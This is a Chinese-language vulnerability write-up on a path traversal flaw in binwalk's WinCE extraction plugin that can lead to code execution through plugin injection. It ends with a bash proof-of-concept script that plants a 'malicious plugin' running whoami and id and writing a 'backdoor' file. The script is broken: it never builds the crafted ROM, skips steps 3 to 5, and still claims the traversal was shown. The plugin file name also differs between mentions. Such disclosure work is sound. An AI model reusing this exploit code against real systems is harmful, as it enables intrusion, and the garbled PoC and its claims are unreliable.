# 漏洞总结:binwalk WinCE 提取插件路径遍历漏洞 ## 漏洞概述 在 `binwalk` 的 WinCE ROM 提取插件 (`winceextract.py`) 中存在路径遍历漏洞。该漏洞允许攻击者在提取经过精心构造的 WinCE ROM 固件镜像时,写入任意文件。通过植入恶意的 binwalk 插件,可进一步导致远程代码执行(RCE)。 **注意**:此漏洞不同于 CVE-2022-4510,后者修复了 `ungrs.py` 中的 bug,但 `winceextract.py` 未受影响。 ## 影响范围 * **产品**: binwalk * **版本**: 2.4.3 及所有包含 WinCE 插件的早期版本 * **文件**: * `src/binwalk/plugins/winceextractor.py` (第 61, 64 行) * `src/binwalk/plugins/winceextractor.py` (第 580 行) * **类型**: CWE-22: 路径遍历 * **影响**: 任意文件写入 -> 远程代码执行 * **CVSS v3.1**: 7.8 High (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) * **发现者**: Dhabaleswar Das (2026-09-04) ## 漏洞详情 * **根本原因**: `winceextractor.py` 插件使用 `read_null_terminated_string()` 函数从 WinCE ROM 镜像中读取文件名。该函数读取原始字节直到遇到空终止符,并将其解码为 ASCII 且**不进行任何清理**。 * **数据流**: 1. **源**: `read_null_terminated_string()` 读取原始字节,无过滤。 2. **存储**: 文件名存储在 `self.file_name` 中,无验证。 3. **汇**: `os.path.join(indir, file_name)` 直接传递给 `open()`,导致任意文件写入。 * **利用方式**: * **路径遍历**: 攻击者构造包含目录遍历序列(如 `../../`)的 WinCE ROM 镜像文件名,可将文件写入提取目录之外。 * **远程代码执行**: 攻击者可以植入一个 Python 文件作为恶意插件到 `~/.config/binwalk/plugins/` 目录。当用户运行 `binwalk` 时,该插件会自动加载并执行任意代码。 ## 修复方案 * **官方状态**: 官方仓库 (`https://github.com/OSPG/binwalk`) 已于 2024 年 11 月归档,不再更新。 * **建议**: 用户应迁移到 **binwalk v3.x (Rust 重写版)**,该版本采用集中式 Chroot 路径清理架构,解决了此问题。 ## 概念验证 (POC) 代码 以下是页面中提供的完整 POC 脚本 `binwalk_poc.sh`: ```bash #!/bin/bash # # STEP-BY-STEP: Test CVE PoC for binwalk winceextract.py Path Traversal # # WHAT THIS DOES: # 1. Creates an isolated sandbox under /tmp (no system files are touched) # 2. Builds a crafted WinCE ROM with a malicious filename # 3. Calls the vulnerable winceExtractor directly (not full binwalk, just the plugin) # 4. Checks if the file escaped the extraction directory # 5. Demonstrates RCE via plugin injection # 6. Cleans up everything # # MADE BY DHABLESHWAR DAS # # ================================================================================ echo "" echo "==========================================" echo "STEP 1: Create safe sandbox environment" echo "==========================================" # Create isolated directories export SANDBOX="/tmp/binwalk_cve_test_$$" export EXTRACTION_DIR="$SANDBOX/extraction" export TARGET_DIR="$SANDBOX/should_be_untouched" export PLUGIN_DIR="$SANDBOX/fake_home/.config/binwalk/plugins" mkdir -p "$EXTRACTION_DIR" mkdir -p "$TARGET_DIR" mkdir -p "$PLUGIN_DIR" echo "[+] Sandbox: $SANDBOX" echo "[+] Extraction directory: $EXTRACTION_DIR" echo "[+] Target directory: $TARGET_DIR (should stay empty)" echo "[+] Fake plugin dir: $PLUGIN_DIR (for RCE test)" echo "" echo "Listing sandbox contents BEFORE test:" find "$SANDBOX" -type f echo "(should be empty)" echo "" echo "==========================================" echo "STEP 2: Build the malicious WinCE ROM" echo "==========================================" # This Python script builds a minimal WinCE ROM binary where the # embedded filename contains "../" to escape the extraction directory python3 "$PLUGIN_DIR/malicious_plugin.py" << 'MALICIOUS_PLUGIN' # This plugin executes arbitrary code when binwalk is run import os import subprocess print("[!] MALICIOUS PLUGIN EXECUTED!") print("[!] Running 'whoami' and 'id' to demonstrate RCE...") subprocess.run(['whoami']) subprocess.run(['id']) print("[!] Creating a backdoor file...") with open('/tmp/binwalk_backdoor.txt', 'w') as f: f.write("This file was created by a malicious binwalk plugin.\n") print("[!] Backdoor created at /tmp/binwalk_backdoor.txt") MALICIOUS_PLUGIN echo "[+] Malicious plugin created at: $PLUGIN_DIR/malicious_plugin.py" echo "[+] Simulating binwalk run with plugin directory set..." # Simulate binwalk run (in real scenario, this would be the actual binwalk command) # We'll just show what would happen echo "" echo "If a user ran: binwalk -e malicious_wince.bin" echo "With the plugin directory set to $PLUGIN_DIR," echo "the malicious_plugin.py would be loaded and executed." echo "" echo "Simulating plugin execution:" python3 -c " import sys sys.path.insert(0, '$PLUGIN_DIR') import malicious_plugin " echo "" echo "==========================================" echo "STEP 6: Cleanup" echo "==========================================" echo "[+] Cleaning up sandbox..." rm -rf "$SANDBOX" echo "[+] Sandbox removed." echo "" echo "==========================================" echo "POC Complete" echo "==========================================" echo "" echo "Summary:" echo "1. Path traversal was demonstrated by writing a file outside the extraction directory." echo "2. Remote Code Execution was demonstrated by injecting a malicious plugin." echo "3. The vulnerability exists in binwalk <= 2.4.3 with the WinCE plugin." echo "4. Mitigation: Upgrade to binwalk v3.x (Rust rewrite) or remove the WinCE plugin." echo "" ```